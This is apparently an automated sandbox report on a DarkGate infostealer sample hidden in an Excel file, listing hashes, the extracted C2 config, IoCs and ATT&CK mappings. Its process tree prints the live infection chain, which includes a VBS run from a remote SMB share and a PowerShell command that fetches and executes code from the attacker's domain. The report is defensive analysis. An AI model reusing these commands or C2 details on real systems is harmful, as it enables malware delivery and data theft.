darkgate | baab40c7c1acabafaee78664e9e59f3b7a6081342862ebd2b126b2bee3aa967f

Resubmissions

15-03-2024 02:46

240315-c9qgnagg39 10

15-03-2024 02:45

240315-c849esgg29 1

14-03-2024 17:53

240314-wgkkgsaf8s 1

14-03-2024 17:45

240314-wb7stsae5w 10

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
15-03-2024 02:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

march-D9445-2024.xlsx
Size

60KB
MD5

ac89528d1040074d45d5c19a0ceb7a6a
SHA1

8b47dba91232a0e1ac14cee24267e9c26d7e483c
SHA256

1d67808fee7115fa2597e8843aa10f737298c9f097397e5de486fc762753ea0b
SHA512

37da11cea5188cc7b7f6c9154410d9d663d5ed306313badbaa421025c49f90bff177613a132d2bff1b529ec214d9eb034937ab8d7830d30bd4451f1579a27feb
SSDEEP

1536:64N5DGhJDl5eZ9l0ohOplRfzDrtw86RUtdkV:643ChJR0vl0ohYlRfzD/6o2

Score

10^/10

darkgate admin888 stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

nextroundst.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
NeONIafa
minimum_disk
50
minimum_ram
4000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 2 IoCs

resource	yara_rule
behavioral2/memory/2256-69-0x0000000004B00000-0x0000000004B73000-memory.dmp	family_darkgate_v6
behavioral2/memory/2256-71-0x0000000004B00000-0x0000000004B73000-memory.dmp	family_darkgate_v6

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1512	3192	WScript.exe	88

Blocklisted process makes network request 4 IoCs

flow	pid	Process
72	3392	powershell.exe
73	3392	powershell.exe
84	3392	powershell.exe
85	3392	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
2256	AutoHotkey.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133549450542818155"	chrome.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3192	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3392	powershell.exe
3392	powershell.exe
3392	powershell.exe
4456	chrome.exe
4456	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3392	powershell.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe
Token: SeCreatePagefilePrivilege	4456	chrome.exe
Token: SeShutdownPrivilege	4456	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe
4456	chrome.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE
3192	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3192 wrote to memory of 1512	3192	EXCEL.EXE	110
PID 3192 wrote to memory of 1512	3192	EXCEL.EXE	110
PID 1512 wrote to memory of 3392	1512	WScript.exe	111
PID 1512 wrote to memory of 3392	1512	WScript.exe	111
PID 3392 wrote to memory of 2056	3392	powershell.exe	116
PID 3392 wrote to memory of 2056	3392	powershell.exe	116
PID 3392 wrote to memory of 2256	3392	powershell.exe	117
PID 3392 wrote to memory of 2256	3392	powershell.exe	117
PID 3392 wrote to memory of 2256	3392	powershell.exe	117
PID 3392 wrote to memory of 932	3392	powershell.exe	118
PID 3392 wrote to memory of 932	3392	powershell.exe	118
PID 4456 wrote to memory of 2228	4456	chrome.exe	121
PID 4456 wrote to memory of 2228	4456	chrome.exe	121
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 5012	4456	chrome.exe	122
PID 4456 wrote to memory of 3868	4456	chrome.exe	123
PID 4456 wrote to memory of 3868	4456	chrome.exe	123
PID 4456 wrote to memory of 2440	4456	chrome.exe	124
PID 4456 wrote to memory of 2440	4456	chrome.exe	124
PID 4456 wrote to memory of 2440	4456	chrome.exe	124
PID 4456 wrote to memory of 2440	4456	chrome.exe	124
PID 4456 wrote to memory of 2440	4456	chrome.exe	124
PID 4456 wrote to memory of 2440	4456	chrome.exe	124
PID 4456 wrote to memory of 2440	4456	chrome.exe	124
PID 4456 wrote to memory of 2440	4456	chrome.exe	124
PID 4456 wrote to memory of 2440	4456	chrome.exe	124
PID 4456 wrote to memory of 2440	4456	chrome.exe	124
PID 4456 wrote to memory of 2440	4456	chrome.exe	124

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
932	attrib.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\march-D9445-2024.xlsx"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3192
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "\\64.226.97.86\share\EXCEL_OPEN_DOC.vbs"
  2⤵
  - Process spawned unexpected child process
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri 'nextroundst.com/kqcmvqtj')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3392
  - - C:\Windows\system32\certutil.exe
      "C:\Windows\system32\certutil.exe" -decodehex a.bin AutoHotkey.exe
      4⤵
      PID:2056
  - - C:\st\AutoHotkey.exe
      "C:\st\AutoHotkey.exe" script.ahk
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:2256
  - - C:\Windows\system32\attrib.exe
      "C:\Windows\system32\attrib.exe" +h C:/st
      4⤵
      Views/modifies file attributes
      PID:932

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc63349758,0x7ffc63349768,0x7ffc63349778
  2⤵
  PID:2228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1880,i,5303538435457735899,10046041184376555334,131072 /prefetch:2
  2⤵
  PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1880,i,5303538435457735899,10046041184376555334,131072 /prefetch:8
  2⤵
  PID:3868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2260 --field-trial-handle=1880,i,5303538435457735899,10046041184376555334,131072 /prefetch:8
  2⤵
  PID:2440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2940 --field-trial-handle=1880,i,5303538435457735899,10046041184376555334,131072 /prefetch:1
  2⤵
  PID:1004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2948 --field-trial-handle=1880,i,5303538435457735899,10046041184376555334,131072 /prefetch:1
  2⤵
  PID:2900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4660 --field-trial-handle=1880,i,5303538435457735899,10046041184376555334,131072 /prefetch:1
  2⤵
  PID:2896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4056 --field-trial-handle=1880,i,5303538435457735899,10046041184376555334,131072 /prefetch:1
  2⤵
  PID:492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 --field-trial-handle=1880,i,5303538435457735899,10046041184376555334,131072 /prefetch:8
  2⤵
  PID:1964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 --field-trial-handle=1880,i,5303538435457735899,10046041184376555334,131072 /prefetch:8
  2⤵
  PID:1004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3264 --field-trial-handle=1880,i,5303538435457735899,10046041184376555334,131072 /prefetch:8
  2⤵
  PID:1060

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
d9020fd7727b6a6c45eeab0d41d30132

SHA1
939b53fc221320deea2954ceef80150dddd7b409

SHA256
d933819c03f34669f851cfad36f2be64a0389a3be7774cc4e0f9a0f49aa2aa16

SHA512
f3cc905e8f4d36415b4b1f79a9678c5d44fbd5260c6990fe0a9e704db8c8628ef5cf90c473bc35a757631a0b3f5cd949d16a29b668b8561b26319ac78920909d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
6513d26350a751cfeffe21d5dcab3c9d

SHA1
afa3c107cbdf5a96d42220aafdd9a2538d814693

SHA256
a2401b92ac2bed200a95bef1b67f97a9216216b2c1514bf1b64c4217d88a7286

SHA512
934e5868932e337fe63f846d038dfa8176745e0a2f8b193a3e379c640f78fce5af0c866fd8de8314a63a0d6082153b9744ee6468657076d943b44f1aaa0e8fcc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
81db5cdb864d1586c49499880d942672

SHA1
3b297fd1ab8dd52effa25a8b96bb6afa1f9f5658

SHA256
23bbfc0b1e636e6ea04a4a49fad5ad6cdbeaeb54cc0f03a53dc0991f1896aced

SHA512
5e54aa3c2373fcc975dca4ce7ee70647c6613b1321fa5f635626137e8c70fe99081de306420ba2ea723a901ee1a52af0e3d6927e9c590e281545fdfdda3e7c5c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
a9ac2ed37f9c788a56b7b2ccdd904210

SHA1
fb12a5576e3c11af477bee0bcd83e9df6fa91511

SHA256
0f955fd5408dabae140c2b2c2bc72a890205c8712f17051b4502c91b6045800e

SHA512
6fbd52e41b664b94c2df8b3c4a1038408d2f51b130455a1114032ea662cd420df29fa1a763703e9aaf3e0f58abad87b73570690ff59d13050305b8ef2b261256

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
258KB

MD5
ccac50c7a36b420ba05f5138dc14aa8c

SHA1
eb1a58eb97e8e3b49471169dc34e54cf22dfdb3a

SHA256
99b52508fbf8ff4460aa1a030a8d246c801bb34ac1adbe995df35ab605306d6c

SHA512
028da288691a92ee85aa52597db18912559fbed373e212be297130ce415d25c55fea3b7301db82ca84763405c17c3e763fc91503195046307a5a08e35882ae34

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zj0afjjs.rzs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\st\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\st\a.bin

Filesize
1.7MB

MD5
bf88d228baec74c7928df463db0f0fdc

SHA1
efe1657bb9a9a31742b71d8c14bae89b2ab5533b

SHA256
493099b55ea0da872d3b9855c5a60752833e737be547ebc5328caea2bf0542ed

SHA512
c247a0dbba9971a8949729f888a4d8b10ca188b6fabedb9d1fe9cc7907cc4d807e66f3367ca287bf1e4062c342cbb7a724a9cc168018f55bc187e04897c8bdfa

Download Submit
C:\st\script.ahk

Filesize
48KB

MD5
2e319e5e6ab619a01eb3b95cd11c8143

SHA1
d7f963ba0a824406e260e2469c2a04767f2afb8c

SHA256
3b7a634458e8195a13a4c1610bb25d78a77f2b904b38835fca391d38509dd530

SHA512
f862af250709b54ebfc4c26236e6947f44468bc908b5f0d70443e483d5cf30efce505b2d5036ba09dfc9c2cc0e9b2a3adb1a6cd6e829d82e4156d75e597ac5c2

Download Submit
C:\st\test.txt

Filesize
913KB

MD5
f5a710f2471af13c14c80b190081b93e

SHA1
24802c121cd6faa57a3b96de8e108b3250a390a9

SHA256
738393c9e46150b246a0db906a22d77ba93812840919bf8b4913ef528df95e35

SHA512
9507fa2e05a10a4c927b84a3e5764a9634d7f5cf76c8c46b41229c8502376b80af624b08602bac2d585f1bee4a1f262053bd6d96886c72588dac1359c7413d52

Download Submit
memory/2256-71-0x0000000004B00000-0x0000000004B73000-memory.dmp

Filesize
460KB

Download
memory/2256-69-0x0000000004B00000-0x0000000004B73000-memory.dmp

Filesize
460KB

Download
memory/3192-36-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-12-0x00007FFC450A0000-0x00007FFC450B0000-memory.dmp

Filesize
64KB

Download
memory/3192-16-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-17-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-18-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-19-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-20-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-21-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-22-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-35-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-0-0x00007FFC47750000-0x00007FFC47760000-memory.dmp

Filesize
64KB

Download
memory/3192-1-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-14-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-2-0x00007FFC47750000-0x00007FFC47760000-memory.dmp

Filesize
64KB

Download
memory/3192-3-0x00007FFC47750000-0x00007FFC47760000-memory.dmp

Filesize
64KB

Download
memory/3192-4-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-5-0x00007FFC47750000-0x00007FFC47760000-memory.dmp

Filesize
64KB

Download
memory/3192-15-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-6-0x00007FFC47750000-0x00007FFC47760000-memory.dmp

Filesize
64KB

Download
memory/3192-7-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-8-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-13-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-9-0x00007FFC450A0000-0x00007FFC450B0000-memory.dmp

Filesize
64KB

Download
memory/3192-11-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3192-10-0x00007FFC876D0000-0x00007FFC878C5000-memory.dmp

Filesize
2.0MB

Download
memory/3392-66-0x00007FFC5EAE0000-0x00007FFC5F5A1000-memory.dmp

Filesize
10.8MB

Download
memory/3392-60-0x000001F72BB70000-0x000001F72BB80000-memory.dmp

Filesize
64KB

Download
memory/3392-59-0x000001F72BB70000-0x000001F72BB80000-memory.dmp

Filesize
64KB

Download
memory/3392-56-0x00007FFC5EAE0000-0x00007FFC5F5A1000-memory.dmp

Filesize
10.8MB

Download
memory/3392-50-0x000001F72C370000-0x000001F72C532000-memory.dmp

Filesize
1.8MB

Download
